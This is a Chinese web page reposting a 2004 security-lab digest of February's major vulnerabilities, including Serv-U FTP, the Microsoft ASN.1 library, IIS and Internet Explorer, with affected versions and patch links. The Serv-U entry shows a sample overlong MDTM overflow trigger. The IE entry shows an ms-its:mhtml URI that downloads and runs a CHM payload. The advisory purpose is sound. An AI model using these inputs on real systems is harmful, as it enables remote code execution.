当前位置:首页 > 技术与方案 > 病毒资讯相关

2004年2月重要安全漏洞总结(上)

(2012-09-15 10:53:56)

启明星辰公司积极防御实验室最新总结出2月份11个重要的安全漏洞信息,详细内容如下:

I. 本月重要安全漏洞

 1. Serv-U FTP 服务器MDTM命令远程缓冲区溢出漏洞
 2. Microsoft ASN.1 库堆溢出漏洞
 3. Microsoft ASN.1 库二进制串漏洞
 4. Microsoft IIS未明远程拒绝服务攻击漏洞
 5. Microsoft IE未明CHM文件处理任意代码执行漏洞
 6. Mac系统中Virtual PC权限提升漏洞
 7. Windows WINS服务远程代码执行漏洞
 8. Microsoft IE 双NUL字符URI存在拒绝服务攻击漏洞
 9. Microsoft Outlook Express任意程序执行漏洞
 10. Microsoft IE浏览器 Bitmap处理整数溢出漏洞
 11. Linux Kernel Samba 共享系统权限提升漏洞

II. 本月重要安全漏洞描述

 1. Serv-U FTP 服务器MDTM命令远程缓冲区溢出漏洞
   发布日期:2004-02-26
   更新日期:2004-02-27
   严重程度:高(远程缓冲区溢出)

   受影响系统:
   RhinoSoft Serv-U 5.0
   RhinoSoft Serv-U 4.x
   RhinoSoft Serv-U 3.x
   RhinoSoft Serv-U 2.x

   不受影响系统:
   RhinoSoft Serv-U 5.0.0.4
描述:
  Serv-U是Windows平台下广泛使用的FTP服务器软件。
  Serv-U在处理"MDTM"命令参数时缺少正确的缓冲区边界检查,远程攻击者可以利用该漏洞对FTP服务程序进行缓冲区溢出攻击,以FTP进程权限在系统上执行任意指令。
  Serv-U提供FTP命令"MDTM"用于用户更改文件时间,当用户成功登录系统,并发送畸形超长的时区数据作为命令参数,如:MDTM 20031111111111+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA /test.txt时,可触发缓冲区溢出,精心构建参数数据可能以FTP进程权限在系统上执行任意指令。
  用户拥有合法帐户登录到系统时可利用该漏洞,不需要写及其他权限。
补丁链接:
  http://www.serv-u.com/

  2. Microsoft ASN.1 库堆溢出漏洞

   发布日期:2004-2-10
   报告日期:2003-6-25
   严重程度:高(远程代码执行)

   受影响系统:
   Microsoft Windows NT 4.0 (all versions)
   Microsoft Windows 2000 (SP3 and earlier)
   Microsoft Windows XP (all versions)

   受影响软件:
   Microsoft Internet Explorer
   Microsoft Outlook
   Microsoft Outlook Express
   Third-party applications that use certificates

   影响的服务:
   Kerberos (UDP/88)
   Microsoft IIS using SSL
   NTLMv2 authentication (TCP/135, 139, 445)
描述:
  eEye Digital发现了Microsoft's ASN.1 库 (MSASN1.DLL)中存在一紧急漏洞,该漏洞允许攻击者在受影响的机器上覆盖堆内容,执行任意代码。该漏洞产生是由于Microsoft's ASN.1 库使用Windows的安全子系统,该漏洞可以被利用绕过路径,包括Kerberos,NTLMv2验证,应用软件的证书(SSL, digitally-signed e-mail, signed ActiveX controls,等)
注意:
  该漏洞的危险级别是紧急,Microsoft Windows NT 4.0,Microsoft Windows 2000,Microsoft Windows XP用户注意打补丁。

相关链接:
  http://www.eeye.com/html/Products/Retina/index.html

补丁链接:
  http://www.microsoft.com/technet/security/bulletin/MS04-007.asp

  3. Microsoft ASN.1 库 二进制串漏洞
   发布日期:2004-2-10
   报告日期:2003-9-25
   严重程度:高(远程代码执行)
   受影响系统:
   Microsoft Windows NT 4.0
   Microsoft Windows 2000
   Microsoft Windows XP
   Microsoft Windows Server 2003
描述:
  eEye Digital发现了Microsoft's ASN.1 库 (MSASN1.DLL)中第二个紧急漏洞,该漏洞允许攻击者在受影响的机器上覆盖堆数据,执行任意代码。该缺陷在Microsoft执行时通过大量Windows应用和服务而被利用。该漏洞被利用是很严重的攻击,包括Kerberos (UDP/88)和NTLMv2验证(TCP/135, 139,445)。
注意:
  该漏洞的危险级别是紧急,Microsoft Windows NT 4.0,Microsoft Windows 2000,Microsoft Windows XP用户注意打补丁。
相关链接:
  http://www.eeye.com/html/Products/Retina/index.html

补丁链接:
  http://www.microsoft.com/technet/security/bulletin/MS04-007.asp

  4. Microsoft IIS未明远程拒绝服务攻击漏洞
   BugTraq ID: 9660
   远程攻击
   拒绝服务攻击
   发布日期: 2004-02-14
   更新日期:2004-02-19
   受影响的系统:
   Microsoft IIS 5.0
   - Microsoft Windows 2000 Server SP2
   - Microsoft Windows 2000 Server SP1
   - Microsoft Windows 2000 Server
   - Microsoft Windows 2000 Professional SP2
   - Microsoft Windows 2000 Professional SP1
   - Microsoft Windows 2000 Professional
   - Microsoft Windows 2000 Datacenter Server SP2
   - Microsoft Windows 2000 Datacenter Server SP1
   - Microsoft Windows 2000 Datacenter Server
   - Microsoft Windows 2000 Advanced Server SP2
   - Microsoft Windows 2000 Advanced Server SP1
   - Microsoft Windows 2000 Advanced Server
描述:

  Microsoft IIS是一款微软开发的WEB服务程序。
  Microsoft IIS 5.0在处理部分ASN.1编码时存在漏洞,远程攻击者可以利用该漏洞进行拒绝服务攻击。
  利用"OpenSSL ASN.1多个解析安全漏洞"( http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=5552 )所描述的漏洞,针对Microsoft IIS 5.0进行攻击,可引起拒绝服务攻击。
相关链接:
  http://www.microsoft.com/technet/security/

  5. Microsoft IE 未明CHM文件处理任意代码执行漏洞
   BugTraq ID: 9658
   远程攻击
   任意代码执行漏洞
   发布日期: 2004-02-13
   更新日期:2004-02-19
   受影响的系统:
   Microsoft Internet Explorer 6.0SP1
   Microsoft Internet Explorer 5.5SP2
   Microsoft Internet Explorer 5.5SP1
   Microsoft Internet Explorer 5.5
   Microsoft Internet Explorer 5.01
   Microsoft Internet Explorer 5.0.1SP3
   Microsoft Internet Explorer 5.0.1SP2
   Microsoft Internet Explorer 5.0.1SP1
   Microsoft Internet Explorer 6.0
   - Microsoft Windows XP Professional
   - Microsoft Windows XP Home
   - Microsoft Windows NT 4.0 SP6a
   - Microsoft Windows ME
   - Microsoft Windows 98 SE
   - Microsoft Windows 98
   - Microsoft Windows 2003 Web Edition
   - Microsoft Windows 2003 Standard Edition
   - Microsoft Windows 2003 Enterprise Edition 64-bit
   - Microsoft Windows 2003 Enterprise Edition
   - Microsoft Windows 2003 Datacenter Edition 64-bit
   - Microsoft Windows 2003 Datacenter Edition
   - Microsoft Windows 2000 Server SP2
   - Microsoft Windows 2000 Server SP1
   - Microsoft Windows 2000 Server
   - Microsoft Windows 2000 Professional SP2
   - Microsoft Windows 2000 Professional SP1
   - Microsoft Windows 2000 Professional
   - Microsoft Windows 2000 Datacenter Server SP2
   - Microsoft Windows 2000 Datacenter Server SP1
   - Microsoft Windows 2000 Datacenter Server
   - Microsoft Windows 2000 Advanced Server SP2
   - Microsoft Windows 2000 Advanced Server SP1
   - Microsoft Windows 2000 Advanced Server
描述:

  Microsoft Internet Explorer是一款流行的WEB浏览器。
  Microsoft Internet Explorer在处理CHM文件时存在漏洞,远程攻击者可以利用该漏洞构建恶意页面,诱使用户访问,可在目标用户系统上自动下载和执行程序。
构建类似包含如下信息的页面:ms-its:mhtml:file://C:ss.MHT!http://www.example.com//chm.chm::/files/launch.htm
可能导致程序在用户系统上自动下载和执行。
相关链接:
  http://www.microsoft.com/windows/ie/default.asp

更多
关闭窗口 打印 
网站首页    -    联系我们    -   收藏本站    -    网站地图                                                               客户服务热线:0571-85023000
本网站所有网页信息已申请知识产权和著作权保护,版权归四海光纤公司所有,未经授权禁止任何人复制或镜像,违者必究。
公司主营:杭州光纤光缆视频会议系统,是专业的通信网络工程、视频会议系统建设专家

中华人民共和国备案号:浙ICP备10018243号